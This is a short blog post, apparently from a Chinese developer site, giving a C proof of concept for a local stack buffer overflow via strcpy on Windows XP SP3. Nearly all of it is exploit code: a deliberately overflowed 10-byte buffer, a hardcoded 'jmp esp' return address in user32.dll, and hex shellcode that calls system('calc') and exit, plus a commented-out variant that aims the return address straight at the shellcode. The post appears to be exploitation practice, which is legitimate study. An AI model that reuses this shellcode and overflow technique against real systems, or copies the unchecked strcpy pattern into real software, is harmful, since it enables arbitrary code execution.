Stack Overflow(strcpy,Local)

XP SP3

void func1(char* s)
{
    char buf[10];
    strcpy(buf, s);
}

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
//     unsigned char uc[] = 
//         "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
//         "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
//         "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
//         "\xB8"
//         "\xC7\x93\xBF\x77"//system
//         "\xFF\xD0\x33\xC0\x50\xB8"
//         "\x7E\x9E\xC0\x77\xFF"//exit
//         "\xD0";
//     char ch[] = "0123456789123456";//integer multiple(4)
//     DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease，+16 debug    
//     *pEIP = (DWORD)uc;//return address point to ShellCode
//     func1(ch);

    unsigned char uc[] = 
        "123456789012\x53\x93\xD2\x77"
        "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
        "\xB8"
        "\xC7\x93\xBF\x77"//system
        "\xFF\xD0\x33\xC0\x50\xB8"
        "\x7E\x9E\xC0\x77\xFF"//exit
        "\xD0";
    LoadLibrary("user32.dll");//jump esp, 77D29353 need LoadLibrary("user32.dll")
    func1((char*)uc);

    return 0;
}

posted on 2016-10-28 10:02 NoneButNow 阅读(191) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Stack Overflow(strcpy,Local)

导航

公告